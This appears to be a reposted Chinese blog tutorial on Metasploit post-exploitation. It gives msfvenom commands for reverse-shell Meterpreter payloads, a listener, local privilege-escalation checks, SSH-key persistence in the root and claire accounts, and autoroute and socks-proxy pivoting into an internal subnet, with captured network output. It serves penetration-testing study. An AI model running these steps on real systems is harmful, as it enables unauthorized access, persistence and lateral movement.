码上快乐

相关内容   简体   繁体

metasploit实战(一)local_exploit_suggester提权

本文转载自  查看原文  2020-05-25 18:48  1000    内网

外层打点拿到webshell之后

Windows:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名

攻击主机监听handler

handler -H 192.168.2.113 -P 3333 -p windows/meterpreter/reverse_tcp

windows使用local_exploit_suggester模块,指定低权限用户的session,进行本地提权

msf5 exploit(linux/local/netfilter_priv_esc_ipv4) > use post/multi/recon/local_exploit_suggester

使用mteasploit保持权限控制

msf5 exploit(windows/local/ms13_081_track_popup_menu) > use post/linux/manage/sshkey_persistence

 

创建了一个新的SSH密钥,然后将其添加到了目标系统的两个账户root和claire中。现在可以通过用户root和claire使用SSH连接到目标系统

后渗透模块

获取目的系统上的各种数据

msf5 post(linux/gather/enum_configs) > use post/linux/gather/enum_system
msf5 post(linux/manage/sshkey_persistence) > use post/linux/gather/enum_configs

拿到外层主机的最高权限不是最终目的,牛逼的黑客会进行内网,拿到更多的主机为目的

进入到meterpreter会话使用arp命令获取到内网网络与被渗透的主机通信过的所有主机

meterpreter > arp

ARP cache
=========

    IP address       MAC address        Interface
    ----------       -----------        ---------
    192.168.2.1      d4:ee:07:6a:62:e6  24
    192.168.2.1      d4:ee:07:6a:62:e6  25
    192.168.2.106    f8:59:71:bf:9d:e3  24
    192.168.2.106    f8:59:71:bf:9d:e3  25
    192.168.2.111    60:ab:67:ea:8a:7a  24
    192.168.2.111    60:ab:67:ea:8a:7a  25
    192.168.2.115    f8:59:71:bf:9e:ba  24
    192.168.2.146    a4:83:e7:ca:4f:32  24
    192.168.2.146    a4:83:e7:ca:4f:32  25
    192.168.2.153    a4:83:e7:ca:4f:32  24
    192.168.2.153    a4:83:e7:ca:4f:32  25
    192.168.2.155    b8:d7:af:21:10:fa  24
    192.168.2.155    b8:d7:af:21:10:fa  25
    192.168.2.160    7c:dd:90:f1:fe:45  24
    192.168.2.167    f4:39:09:60:06:ff  24
    192.168.2.167    f4:39:09:60:06:ff  25
    192.168.2.170    cc:40:d0:04:5c:b1  24
    192.168.2.170    cc:40:d0:04:5c:b1  25
    192.168.2.174    3c:22:fb:12:c8:6b  24
    192.168.2.174    3c:22:fb:12:c8:6b  25
    192.168.2.179    0c:2c:54:2d:c4:48  24
    192.168.2.179    0c:2c:54:2d:c4:48  25
    192.168.2.184    80:a5:89:78:cc:41  24
    192.168.2.184    80:a5:89:78:cc:41  25
    192.168.2.189    cc:2d:21:68:10:20  24
    192.168.2.189    cc:2d:21:68:10:20  25
    192.168.2.190    f0:18:98:6b:ed:5b  24
    192.168.2.190    f0:18:98:6b:ed:5b  25
    192.168.2.191    f0:18:98:6b:ed:5b  24
    192.168.2.191    f0:18:98:6b:ed:5b  25
    192.168.2.209    7c:94:2a:69:ef:f2  24
    192.168.2.209    7c:94:2a:69:ef:f2  25
    192.168.2.211    08:40:f3:f3:d4:40  24
    192.168.2.211    08:40:f3:f3:d4:40  25
    192.168.2.214    3c:22:fb:41:21:6d  24
    192.168.2.214    3c:22:fb:41:21:6d  25
    192.168.2.222    50:e0:85:40:51:b9  24
    192.168.2.222    50:e0:85:40:51:b9  25
    192.168.2.255    ff:ff:ff:ff:ff:ff  24
    192.168.2.255    ff:ff:ff:ff:ff:ff  25
    192.168.10.1     08:40:f3:f3:d4:40  24
    192.168.10.1     08:40:f3:f3:d4:40  25
    192.168.52.138   00:0c:29:f1:ee:b6  11
    192.168.52.255   ff:ff:ff:ff:ff:ff  11
    224.0.0.2        00:00:00:00:00:00  1
    224.0.0.2        01:00:5e:00:00:02  11
    224.0.0.2        01:00:5e:00:00:02  22
    224.0.0.2        01:00:5e:00:00:02  23
    224.0.0.2        01:00:5e:00:00:02  24
    224.0.0.2        01:00:5e:00:00:02  25
    224.0.0.22       00:00:00:00:00:00  1
    224.0.0.22       01:00:5e:00:00:16  11
    224.0.0.22       01:00:5e:00:00:16  22
    224.0.0.22       01:00:5e:00:00:16  23
    224.0.0.22       01:00:5e:00:00:16  24
    224.0.0.22       01:00:5e:00:00:16  25
    224.0.0.252      00:00:00:00:00:00  1
    224.0.0.252      01:00:5e:00:00:fc  11
    224.0.0.252      01:00:5e:00:00:fc  22
    224.0.0.252      01:00:5e:00:00:fc  23
    224.0.0.252      01:00:5e:00:00:fc  24
    224.0.0.252      01:00:5e:00:00:fc  25
    239.255.255.250  00:00:00:00:00:00  1
    239.255.255.250  01:00:5e:7f:ff:fa  11
    239.255.255.250  01:00:5e:7f:ff:fa  24
    239.255.255.250  01:00:5e:7f:ff:fa  25
    255.255.255.255  ff:ff:ff:ff:ff:ff  22
    255.255.255.255  ff:ff:ff:ff:ff:ff  23
    255.255.255.255  ff:ff:ff:ff:ff:ff  24
    255.255.255.255  ff:ff:ff:ff:ff:ff  25

可以看到一共有三个单独的网络192.168.2.0,192.168.52.0,192.168.10.0,输入ifconfig查看目标系统是否安装有连接到其他网络的网卡

meterpreter > ifconfig 

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:70:42:ff
MTU          : 1500
IPv4 Address : 192.168.52.143
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::244d:662e:a591:1102
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:348f
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 15
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280


Interface 16
============
Name         : Microsoft ISATAP Adapter #3
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280


Interface 17
============
Name         : Microsoft ISATAP Adapter #4
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280


Interface 22
============
Name         : TAP-Windows Adapter V9
Hardware MAC : 00:ff:44:8d:cb:b5
MTU          : 1500
IPv4 Address : 169.254.135.129
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::480f:c25c:1f43:8781
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 23
============
Name         : TAP-Windows Adapter V9 #2
Hardware MAC : 00:ff:56:0b:ea:fc
MTU          : 1500
IPv4 Address : 169.254.99.189
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::4d82:616f:441c:63bd
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 24
============
Name         : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:70:42:09
MTU          : 1500
IPv4 Address : 192.168.2.119
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::7ce5:fe69:e471:a4cd
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 25
============
Name         : Intel(R) PRO/1000 MT Network Connection #3
Hardware MAC : 00:0c:29:70:42:13
MTU          : 1500
IPv4 Address : 192.168.2.129
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::e888:5537:82cf:3c2a
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 11是独立52网段的网卡,此时我们的攻击主机是无法直接连接到这个网络的。所以我们需要被渗透主机将数据转发到目的系统的机制,将渗透主机作为跳板(piovting)机。首先通过Meterpreter在被渗透主机添加
一条到达目标内部网络的路由。
横向移动添加路由信息
(1)
msf添加路由,使用代理进入内网
run  get_local_subnets    查看当前网段
run autoroute -s 192.168.52.0/24 添加路由段

(2)

msf5 post(linux/gather/enum_system) > use post/multi/manage/autoroute

 

成功使用跳板机扫描内网

 

 

使用socks模块将流量代理出来

msf5 auxiliary(server/socks4a) > use auxiliary/server/socks4a

 

 配置浏览器使用socks4,ip为msf的ip,端口为msf的端口(这个代理逻辑是,将socks代理在本地,然后msf主机转发流量,此前已经将内网的路由信息通过post后渗透模块添加进去了)

 

 

 proxychains

 

 proxies

 

内网进去了, 代理出来了,就是内网的资产扫描了。

开3389进去传工具扫描的先不谈了。

谈一下通过proxychains命令行

首先,主机存活扫描

使用nmap和masscan进行主机存活,端口扫描,服务识别

探测目标系统都安装了哪些应用

msf5 auxiliary(server/socks4a) > use post/windows/gather/enum_applications

 

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 linux提权辅助工具(一):linux-exploit-suggester.sh linux提权辅助工具(二):linux-exploit-suggester-2.pl 利用Metasploit进行Linux提权 metasploit下Windows下多种提权方式 metasploit下Windows下多种提权方式 免考final linux提权与渗透入门——Exploit-Exercise Nebula学习与实践 Suid之find提权靶机渗透实战 linux 提权 实战Linux下三种不同方式的提权技巧 提权 提权
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM